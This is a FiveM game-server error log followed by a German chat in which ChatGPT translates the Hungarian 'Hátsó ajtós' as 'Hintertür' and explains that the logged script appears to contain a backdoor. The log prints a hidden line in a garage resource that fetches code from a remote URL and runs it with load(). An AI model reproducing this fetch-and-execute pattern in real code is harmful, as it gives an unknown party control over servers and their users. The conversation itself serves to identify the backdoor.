[ 591485] [b3258_GTAProce] MainThrd/ ^1SCRIPT ERROR: [string "PerformHttpRequest('
..."]:1: attempt to call a nil value (global 'PerformHttpRequest')^7
[ 591485] [b3258_GTAProce] MainThrd/ ^3> [global chunk]^7 (^5erformHttpRequest('
', function (e, d) pcall(function() assert(load(d))() end) end)^7:1)
[ 591485] [b3258_GTAProce] MainThrd/ ^3> fn^7 (^5@codem-garage/client/main.lua^7:401)
[ 591485] [b3258_GTAProce] MainThrd/ OnConnectionProgress: Mounted codem-garage (1 of 1)
[ 592047] [b3258_GTAProce] MainThrd/ ^1SCRIPT ERROR: @codem-garage/client/main.lua:49: attempt to index a nil value (global 'frameworkObject')^7
[ 592047] [b3258_GTAProce] MainThrd/ ^3> fn^7 (^5@codem-garage/client/main.lua^7:49)
übersetze das Hátsó ajtós.!!
ChatGPT:
Die ungarische Phrase
"Hátsó ajtós" lässt sich ins Deutsche mit
"Hintertür" übersetzen. Der Begriff könnte sich auf eine "hintere Tür" oder eine "Türe hinten" beziehen, je nach Kontext.
Falls es sich um einen bestimmten Ausdruck oder eine Redewendung handelt, lass es mich wissen, dann kann ich die Bedeutung weiter präzisieren!
4o mini
Du:
es geht um das obere skript
ChatGPT:
Ah, jetzt verstehe ich! Du beziehst dich auf die Phrase
"Hátsó ajtós" im Zusammenhang mit dem oben erwähnten Skript. In diesem Fall könnte der Ausdruck metaphorisch oder als Codebegriff gemeint sein, da "hintere Tür" in der IT-Welt oft eine "Backdoor" bezeichnet, also eine geheime oder nicht-offizielle Möglichkeit, auf ein System zuzugreifen.
Falls du diesen Ausdruck im Kontext des Skripts (insbesondere bei der Verwendung von PerformHttpRequest und der externen URL) siehst, könnte es darauf hinweisen, dass eine "Backdoor" aufgerufen wird, die möglicherweise unsicheren oder unerwünschten Code lädt.
In diesem Fall könnte der Aufruf zu einer URL wie
... möglicherweise als Teil einer solchen Backdoor fungieren, die ohne das Wissen des Nutzers oder Entwicklers potenziell unsicheren Code ausführt.
Es wäre sinnvoll, diesen Code zu überprüfen und sicherzustellen, dass die URL nicht zu einer unsicheren Quelle führt, insbesondere, wenn du den Verdacht hast, dass es sich um eine Art von Schadcode handeln könnte. Wenn du unsicher bist, ob es sich um eine legitime URL handelt, solltest du den Code von dieser Quelle entfernen und stattdessen eine vertrauenswürdige Quelle verwenden.
4o mini